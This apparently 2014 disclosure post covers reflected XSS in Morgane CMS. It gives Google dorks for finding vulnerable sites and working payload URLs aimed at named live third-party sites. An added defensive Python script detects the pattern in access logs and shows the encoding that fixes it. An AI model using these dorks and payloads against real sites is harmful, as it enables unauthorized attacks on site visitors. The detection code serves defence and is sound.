Thursday, 3 July 2014

Morgane CMS - XSS Vulnerability

Dorks:
intext:"www.morgane.co.uk" inurl:"/main.php?sid="
intext:"www.morgane.co.uk" inurl:"/main.php?id=" 

Use the String.fromCharCode payload, or plain numbers.

Example & Live Demo:

String.fromCharCode mode:
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Numbers mode (testing mode):
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
* The XSS only fires in Firefox, not in Google Chrome :D
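The payloads above all work the same way: the `id`/`sid` value is reflected into a double-quoted HTML attribute, and the leading `%22%3E` (`">`) closes that attribute so a `<script>` element can follow. The script below is an added example for the defending side; it is not code from the advisory or from Morgane CMS. It URL-decodes the query parameters of access-log requests and flags ones carrying that break-out pattern, and shows the attribute encoding that would have neutralised it. The hostnames, IPs and log lines are constructed, and the regexes are a starting point to tune, not an exhaustive signature.

```python
"""Added example (not part of the original advisory): flag the reflected-XSS
pattern from the Morgane CMS write-up in web-server access logs, and show the
output encoding that stops it.  Hosts, addresses and log lines are constructed."""
import html
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed common-log-format lines (hypothetical site). Lines 2 and 3 carry
# the attribute break-out + <script> pattern, using the same encoding style as
# the advisory's demo URLs; lines 1 and 4 are ordinary requests.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jul/2014:10:00:01 +0000] "GET /main.php?id=505 HTTP/1.1" 200 5120
203.0.113.9 - - [03/Jul/2014:10:00:07 +0000] "GET /main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E HTTP/1.1" 200 5180
203.0.113.9 - - [03/Jul/2014:10:00:12 +0000] "GET /en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097%29%29;%3C/script%3E HTTP/1.1" 200 5180
198.51.100.2 - - [03/Jul/2014:10:01:00 +0000] "GET /main.php?sid=42&lang=en HTTP/1.1" 200 4999
"""

# Pull method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers of script injection after the decoded value has been inspected:
# a <script> tag, a javascript: URL, or an on*= event-handler attribute.
SUSPICIOUS = re.compile(r'<\s*script\b|javascript:|\bon\w+\s*=', re.IGNORECASE)


def decoded_params(target):
    """Return (name, decoded value) pairs for the query string of a request target.

    The query is split by hand rather than with parse_qsl so that ';' inside a
    payload (e.g. 'alert(1337);') is never treated as a pair separator.  Values
    are percent-decoded once, matching the single encoding in the advisory's
    URLs; a double-encoded variant would need a second decode pass.
    """
    query = urlsplit(target).query
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def flag_line(line):
    """Return the (name, decoded value) pairs in one log line that match SUSPICIOUS."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    return [(k, v) for k, v in decoded_params(m.group("target")) if SUSPICIOUS.search(v)]


def scan_log(text):
    """Return (line_number, param_name, decoded_value) for every flagged parameter."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, value in flag_line(line):
            hits.append((n, name, value))
    return hits


def safe_attr(value):
    """Encode a value for use inside a double-quoted HTML attribute.

    This is the fix the CMS needed before reflecting id/sid: the '"' that
    opens the break-out becomes &quot;, so the attribute can no longer be
    closed and the '<' of the script tag becomes inert &lt;.
    """
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for n, name, value in scan_log(SAMPLE_LOG):
        print(f"line {n}: param {name!r} decodes to {value!r}")
        print(f"         encoded for an attribute it would render as {safe_attr(value)!r}")
```

Run it as-is to see the two constructed hits decoded and their harmless encoded forms; point `scan_log` at a real log file's contents to use it on live data. The match is deliberately done on the decoded value, because the raw log line only shows `%3Cscript%3E`, which naive substring rules on `<script>` miss.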



NEXUS